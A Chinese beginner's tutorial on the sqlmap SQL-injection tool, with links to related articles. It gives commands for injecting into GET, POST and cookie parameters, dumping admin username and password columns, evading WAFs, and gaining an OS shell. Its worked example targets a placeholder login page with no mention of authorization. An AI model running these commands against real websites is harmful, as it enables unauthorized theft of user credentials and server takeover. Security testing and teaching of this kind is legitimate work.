sqlmap 入門級使用(簡易教程)

雖然我用過mssql和oracle,但表示只是用過,不是很熟,所以本文大多數(shù)都在說MySQL數(shù)據(jù)庫。
一、數(shù)據(jù)庫
數(shù)據(jù)庫管理系統(tǒng) -> 數(shù)據(jù)庫(可能存在多個) -> 表(一般一個數(shù)據(jù)庫中都存儲多個表) -> 字段 (一般一個表中都有多個字段)
也就是說:一般都是一對多的關系,這里就不深究了,我們先來看看表(tables)的結構。
這是從phpmyadmin中截取的一張圖片,看起來是不是有點像excel 表格呢?
數(shù)據(jù)庫中一般都會存儲很多數(shù)據(jù),包括我們的用戶名和密碼,所以很多黑客就喜歡搞數(shù)據(jù)庫咯。
二、sqlmap 枚舉數(shù)據(jù)庫
首先進入終端,如果是Linux,就是terminal,如果是Windows,就是cmd。
當然,進行sql注入之前,你先要找到注入點,怎么找?google什么的,貌似還有些工具,我這里只是為了記錄sqlmap的使用過程,不做深入。
1、枚舉數(shù)據(jù)庫
參數(shù)-u 表示URL,也就是注入點了,--dbs表示枚舉數(shù)據(jù)庫,說枚舉太官方了,我們不如說:請sqlmap列出所有的數(shù)據(jù)庫名。
2、枚舉表 tables
使用-D 參數(shù),把剛才枚舉出來的數(shù)據(jù)庫寫到后面。--tables表示枚舉這個數(shù)據(jù)庫下面的表。
結果為:
那么我們就可以猜測那個數(shù)據(jù)庫下面是用戶名和密碼了,也可以把數(shù)據(jù)庫dump到我們的電腦上。進行分析。
3、枚舉字段
意思就是說,枚舉這個數(shù)據(jù)庫下面的這個表,下面有哪些字段。
4、數(shù)據(jù)dump
這個命令表示dump當前這個數(shù)據(jù)庫,下面的這個表中的所有數(shù)據(jù)。
如果這個表中剛好是管理員的用戶名和密碼的話,就可以嘗試進行后臺掃描和登錄了。
總結:注入漏洞是一個經典的漏洞,我這里只是簡單描述sqlmap的使用方法,關于高級的方式請參考官方說明。
sql注入雖然是個老是的注入攻擊方式,當目前已經出現(xiàn)其它類型的變形注入,還是需要web開發(fā)者繼續(xù)關注安全。
sqlmap簡易教程–幫助文檔個人使用經驗解析
最近看到很多大牛發(fā)sqlmap的視頻教程。
然后偶就屁顛屁顛滾去下了一個,然后尼瑪,一連從頭看到尾。。。。。。各種科普啊,看視頻有點浪費時間。
各位別去被坑爹了,來個sqlmap 簡易教程算了,何必浪費看視頻的時間。
sqlmap 再牛逼也就是個python的腳本,腳本再牛逼也得有–help -hh
所以第一件事當然是滾去看幫助文檔。
sqlmap -hh
我操。。。。。。。這么多英文,多少只草泥馬在心中奔騰,咋辦,硬著頭皮看唄,有些人頭皮硬不了咋辦,簡單,來,哥教你簡單的
注入分法不同,種類不同,來個簡單的分類:
1.get型:sqlmap -u “http://xxx.xx.xxx/xx.xxx?xx=xxx”
2.post型: sqlmap -u “http://xxx.xx.xxx/xx.xxx” –data=”xxxx=xxxx&xxxx=xxx”
3.cookie類注入: sqlmap -u “http://xxx.xx.xxx/xx.xxx?xx=xxx” –cookie=”xxx=xxx&xxx=xxx” –level=2
好,區(qū)分完畢再來后續(xù)的
需要數(shù)據(jù)庫好:–dbs
得到數(shù)據(jù)庫名稱xxx,需要表: -D xxx –tables
得到表名xxxx,需要段:-D xxx -T xxxx –columns
得到段內有admin,password,需要值:-D xxx -T xxxx -C “admin,password” –dump
那么我們來理解一下,-D -T -C 是干嗎的,當然就是知道其名稱,指定使用其。
–dbs –tables –columns 是干嗎的,當然就是不知道名稱,列出來唄
–dump 那自然就是字面意思,類似于導出數(shù)據(jù)的行為
其實注入有了上面這幾個命令,妥妥的夠用了,不過還需要繞waf –tamper=”"
注入被識別出來是工具,斷開咋辦–user-agent=”"
再多牛逼的功能都是慢慢積累出來的,別想一口吃成胖子
好,跑數(shù)據(jù)庫就是這么簡單,于是呢來一個稍微有點干貨的例子:
http://www.xxx.com/login.asp有post注入,我想日了,但是我不想出去拷貝post數(shù)據(jù),很麻煩,我想讓sqlmap自動跑post注入
sqlmap -u “http://www.xxx.com/login.asp” –forms
很好,上面的命令成功的幫我跑了post注入,并且找到了post的注入點jjj=123
sqlmap -u “http://www.xxx.com/login.asp” –forms -p jjj –dbs
于是我用上面的命令看看數(shù)據(jù)庫
sqlmap -u “http://www.xxx.com/login.asp” –forms -p jjj –is-dba
順便看看當前用戶是不是dba
sqlmap -u “http://www.xxx.com/login.asp” –forms -p jjj -a
用了上面的命令 -a能得到什么呢:自己去看幫助吧。
幫你篩選了一下,-a下面的那些命令是用來看用戶,看主機,看權限的。
后來呢,我發(fā)現(xiàn)權限還是挺高的,同時呢,我跑出來了數(shù)據(jù)庫名稱kkk
sqlmap -u “http://www.xxx.com/login.asp” –forms -p jjj -D kkk –tables
同時我找到了網站路徑,然后我就又一次找到了sqlmap的牛逼的–os-xx系列命令,可以執(zhí)行系統(tǒng)命令,同時還發(fā)現(xiàn)了牛逼的xpcmdshell –os-shell
以及很多牛逼的文件操作命令–file-xx 這些命令在需要用的時候使用就是了,會給你帶來意想不到的驚喜
與此同時,我發(fā)現(xiàn)tables里面沒有我想要的東西,我也找不到合適的內容,咋辦呢,心一橫,我決定把所有的數(shù)據(jù)庫內容跑出來自己找,于是我這么做:
sqlmap -u “http://www.xxx.com/login.asp” –forms -p jjj -D kkk –dump-all
然后牛逼的sqlmap就開始跑啊跑,然后緊接著我的蛋就碎了,尼瑪,sqlmap一會就問你一次要不要破解密碼,要不要這個,要不要那個,我和我的小朋友們都想擦你妹夫,功夫不負有心人,我又看見了一個命令 –batch 可以自動選擇sqlmap默認選項
于是,我可以和我的小朋友們玩耍去了,再也不用看著sqlmap拖庫了。
總結下來,幫助文檔還是很重要的,多看看,總會有些收獲:
為了避免各位看英文看到吐,大概總結下:
Target: 字面意思,目標,那么就是確定目標的
Request: 字面意思,請求,就是定義請求內容的,比如post數(shù)據(jù),http頭,cookie注入,http頭污染等等
Optimization:字面意思,調節(jié)性能,等等
Injection: 字面意思,注入的設置內容基本在這里,比如指定注入點,指定db,指定系統(tǒng),等等
Detection:
基本就是用在確認注入范圍,尋找注入點區(qū)域,這些
Technique:
基本用在確定注入手段,以及攻擊方式
Fingerprint:
基本用在指紋識別,用的很少
Enumeration:
枚舉信息,主要用在注入中,很重要,很常用
Brute force:
用來爆破,其實主要是枚舉tables columns用的
User-defined function injection:
現(xiàn)在只有udf提權,以及指定一些自己定義的sqlmap腳本用,高端使用,求大牛指點
File system access
主要是文件讀取,文件寫入
Operating system access
主要用在對系統(tǒng)操作,例如os-shell 以及 后續(xù)的連接metasploit 實現(xiàn)后滲透攻擊
windows registry access
基本就是注冊表操作了
General
字面意思,綜合的內容,一些特殊的功能實現(xiàn),我在這里找到了crawl batch這些非常好用的參數(shù)
Miscellaneous
目測高端應用,還沒怎么用過,求大神指教
如上面總結的,大概紅字就是常用的命令,剩下的不常用里面也有很多很不錯,在特殊情況下適用的內容,反正本貼科普而已。
字有點多,想看的菜鳥朋友認真看下來應該會有些收獲,菜鳥們如果有什么其他的奇技淫巧,還希望分享1、2 共同進步??!
相關文章
- SQLmap是一款用來檢測與利用SQL注入漏洞的免費開源工具,有一個非常棒的特性,即對檢測與利用的自動化處理(數(shù)據(jù)庫指紋、訪問底層文件系統(tǒng)、執(zhí)行命令)2015-09-30
SQLMAP Win 下Python環(huán)境運行不正常解決方法(已測)
這篇文章主要介紹了SQLMAP Win 下Python環(huán)境運行不正常解決方法(已測),需要的朋友可以參考下2015-09-04- 上一篇文章《sqlmap用戶手冊》其實只寫了大部分可能用到的參數(shù),還有些并未寫,這次補上~2014-07-29
- sqlmap 是一個自動SQL 射入工具。文章內容有點長,但都是精華,讀者們耐心的看吧,續(xù)篇的鏈接在文末。2014-07-29
- sqlmap 是一個自動SQL 射入工具。本文收集了一些利用Sqlmap做注入測試的TIPS,其中也包含一點繞WAF的技巧,便于大家集中查閱,歡迎接樓補充、分享。2014-07-29
- 在Windows XP上安裝和運行SqlMap的步驟分享,其實就是安裝一個python,然后將gui界面復制到里面2015-09-03
- SQLMAP 視頻動畫教程,方便新手朋友2012-10-16
- 看大牛的視頻,學習一下,附上截圖 算是轉載吧...只是為了分享一下,方便需要的朋友2012-10-16
- SQLMAP 注射工具用法 著名黑客注射工具sqlmap的使用方法2012-10-16
sqlmap 一個自動SQL 射入工具(sqlmap.py)漢化直接可用版
sqlmap 是一個自動SQL 射入工具。它是可勝任執(zhí)行一個廣泛的數(shù)據(jù)庫管理系統(tǒng)后端指印, 檢索遙遠的DBMS 數(shù)據(jù)庫, usernames, 桌, 專欄, 列舉整個DBMS, 讀了系統(tǒng)文件和利用導致S2015-01-04